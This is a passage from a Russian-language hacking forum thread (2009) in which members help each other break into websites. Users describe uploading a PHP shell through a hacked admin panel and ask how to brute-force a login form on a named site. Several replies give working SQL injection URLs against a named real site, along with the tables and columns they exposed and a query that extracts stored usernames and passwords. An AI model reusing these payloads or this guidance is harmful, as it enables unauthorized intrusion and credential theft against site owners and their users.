Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    на венде нет чмодов, поэтому и не ставит. А файлы редактировать не можешь, потмоу что прав нет. В настройках IIS можно так настраивать.
     
    1 person likes this.
  2. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    уже лучше,а где если не сикрет включить/отключить?
     
  3. Gray_Wolf

    Gray_Wolf Active Member

    Joined:
    7 Mar 2009
    Messages:
    377
    Likes Received:
    135
    Reputations:
    10
    В настройках учётных записей, хотя боюсь в винде это будет сделать не просто...
     
    2 people like this.
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Наверное в конфигах IIS - но прав у тебя нет наверняка для этого.

    ЗЫ. в какой доменной зоне сайт?)
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Shadrin, существуют простые аплодеры которые работают средствами mysql, через into outfile
     
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    введи у себя на винде в цмд и почитай:
    Может и прокатит на твоем шелле,хотя и маловероятно.
     
  7. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    хелп плиз.
    есть доступ к админке, можно заливать файлы на сервер, залил php shell, но на сервере Safe-mode ON. даже листинг файлов сделать нельзя.
    Скажите что нужно прописать в .htaccess, чтобы в папке(не cgi-bin) исполнялись perl скрипты?
     
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    чти
     
  9. nitr00

    nitr00 New Member

    Joined:
    2 Sep 2009
    Messages:
    80
    Likes Received:
    4
    Reputations:
    0
    ребят всем доброго времени суток
    подскажите пожалуйста я установил xampp запустил цмд прописал путь :
    c:\xampp\php\php.exe
    далее начал прописывать путь к сплойту и нечего не происходит
    даже если написать после хампа всякую чушь вроде dsdhsds тоже не реагирует
    просьба за символичискую плату помоч =)) если ошибся разделом извиняйте
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    создай .bat файл в нем пропиши


    CD\
    cmd /k xampp\php\php.exe C:\sploitipb\1.php .. .. ...

    ..- какие функции у тебя там для сплоита
     
    _________________________
    2 people like this.
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не функции, а аргументы )
     
    1 person likes this.
  12. Kreoda

    Kreoda New Member

    Joined:
    9 Sep 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем привет.Нашёл инжект в Microsoft JET Dabatase.Узнал пару тройку имён таблиц.Количество полей подобрал.После подстановки реальной таблицы выдаётся ошибка:

    Syntax error in FROM clause.

    Как это объяснить и как выдрать информацию ?

    Запрос вышел что-то вроде parameter+union+select+1,2,3+FROM+realtable
     
  13. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
    http://gazanalyzator.ru/?id=70+union+select+1,2/*
    Заранее спасибо)
     
  14. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    _ttp://gazanalyzator.ru/?id=-70+union+select+version()+from+news/* :)
     
    #9134 DrAssault, 5 Oct 2009
    Last edited: 5 Oct 2009
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    =============================
    gazanalyzator.ru
    89.104.81.227
    =============================
    4.1.22-standard
    -------
    -------
    Найденные таблицы:
    -------
    itaf_user
    news
    vote_results
    -------
    =============================
    Найденные колонки из таблицы itaf_user:
    -------
    id
    user_name
    user_pass
    user_mail
    =============================
    
    
    http://gazanalyzator.ru/?id=70+union+select+1,concat_ws(0x3a,user_name,user_pass)+from+itaf_user/*
    
     
    #9135 Pashkela, 5 Oct 2009
    Last edited: 5 Oct 2009
    1 person likes this.
  16. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/
     
    1 person likes this.
  17. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    http://forum.antichat.ru/thread109600.html
    Эту попробуй
     
    2 people like this.
  18. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    Возможностей много но прага сырая. :mad:
    Обьясни как брудить форму прагой brutus-aet2. :confused:
     
  19. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,184
    Likes Received:
    618
    Reputations:
    690
    Прога не сырая а универсальная, как раз формы норм брутит....
     
    _________________________
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    И так
    Твой запрос приводит к ошибке.
    Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
    Т.е. intval() нету, что неплохо.
    Зато просто ограничение в 2 символа :)
    Если хочешь, крути скулю в лимит 2 символа ;)
     
    1 person likes this.
Thread Status:
Not open for further replies.